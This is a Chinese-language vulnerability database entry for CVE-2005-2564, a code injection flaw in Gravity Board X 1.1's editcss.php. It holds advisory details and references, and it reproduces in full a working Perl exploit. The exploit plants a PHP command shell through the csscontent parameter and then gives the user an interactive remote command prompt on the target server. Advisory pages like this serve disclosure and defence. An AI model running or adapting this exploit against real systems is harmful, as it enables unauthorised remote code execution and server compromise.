CVE-2005-2564
CVSS7.5
发布时间 :2005-08-16 00:00:00
修订时间 :2016-10-17 23:28:27
NMCOE    

[原文]Direct static code injection vulnerability in editcss.php in Gravity Board X (GBX) 1.1 allows remote attackers to execute arbitrary PHP code, HTML, and script via the csscontent parameter, which is directly inserted into the gbxfinal.css file.


[CNNVD]Gravity Board X 'editcss.php' 静态代码注入漏洞(CNNVD-200508-128)

        Gravity Board X (GBX) 1.1中的editcss.php页面存在直接静态代码注入漏洞。这使得远程攻击者可以借助于csscontent参数直接执行任意PHP代码、HTML或脚本(直接插入到gbxfinal.css文件中)。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2564
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2564
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200508-128
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=112351740803443&w=2
(UNKNOWN)  BUGTRAQ  20050807 Gravity Board X v1.1 multiple vulnerabilities
http://xforce.iss.net/xforce/xfdb/21742
(UNKNOWN)  XF  gravityboardx-template-xss(21742)

- 漏洞信息

Gravity Board X 'editcss.php' 静态代码注入漏洞
高危 未知
2005-08-16 00:00:00 2005-10-20 00:00:00
远程  
        Gravity Board X (GBX) 1.1中的editcss.php页面存在直接静态代码注入漏洞。这使得远程攻击者可以借助于csscontent参数直接执行任意PHP代码、HTML或脚本(直接插入到gbxfinal.css文件中)。

- 公告与补丁

        

- 漏洞信息 (1510)

Gravity Board X <= 1.1 (csscontent) Remote Code Execution Exploit (EDBID:1510)
php webapps
2006-02-17 Verified
0 RusH
N/A [点击下载]
#!/usr/bin/perl

## Gravity Board X v1.1 (possibly prior versions) remote code execution exploit
## (c)oded by 1dt.w0lf
## 14.08.2005
## RST/GHC
## http://rst.void.ru
## http://ghc.ru

use LWP::UserAgent;

if(@ARGV<1) { &usage; exit(0); }

$path = $ARGV[0];
header();
print "Creating shell... Please wait\n";

$gr = LWP::UserAgent->new() or die;
$res = $gr->get($path.'editcss.php?csscontent=</style><?php error_reporting(0); system($HTTP_POST_VARS[cmd]); ?>');
if($res->as_string =~ /unable to save changes/)
 {
 print "Forum unable to save changes in css template. Exploitation failed.\n";
 exit(0);
 }
print "DONE.\n";

while ()
 {
    print "Type command for execute or 'q' for exit\nGravity# ";
    while(<STDIN>)
     {
        $cmd=$_;
        chomp($cmd);
        exit() if ($cmd eq 'q');
        last;
     }
    &run($cmd);
 }

sub run()
 {
 $cmd2  = 'echo 1 && echo _START_ && ';
 $cmd2 .= $cmd;
 $cmd2 .= ' && echo _END_';
 $gr = LWP::UserAgent->new() or die;
 $res = $gr->post($path.'index.php',{"cmd" => "$cmd2"});   
 @result = split(/\n/,$res->content);
 $runned = 0;
 $on = 0;
 print "\n";
 for $res(@result)
  {
    if ($res =~ /^_END_/) { print "\n"; return 0; }
    if ($on == 1) { print "  $res\n"; }
    if ($res =~ /^_START_/) { $on = 1; $runned = 1; } 
  }
 print "Can't execute command\n" if !$runned;
 }

sub header()
{
 print "--* Gravity Board X v1.1 exploit by RST/GHC\n";
 print "--* keep it private, not for public\n";
}

sub usage()
 {
  header();
  print "usage : r57Gravity.pl [path_to_forum]\n";
  print "  e.g.: r57Gravity.pl http://127.0.0.1/forum/\n";
 }

# milw0rm.com [2006-02-17]
		

- 漏洞信息

18628
Gravity Board X editcss.php Template Edit Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Gravity Board X contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'editcss.php' not properly sanitizing user input supplied. This may allow a remote attacker to arbitrary manipulate the template and execute arbitrary commands resulting in a loss of integrity.

- 时间线

2005-08-07 Unknow
2005-08-07 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站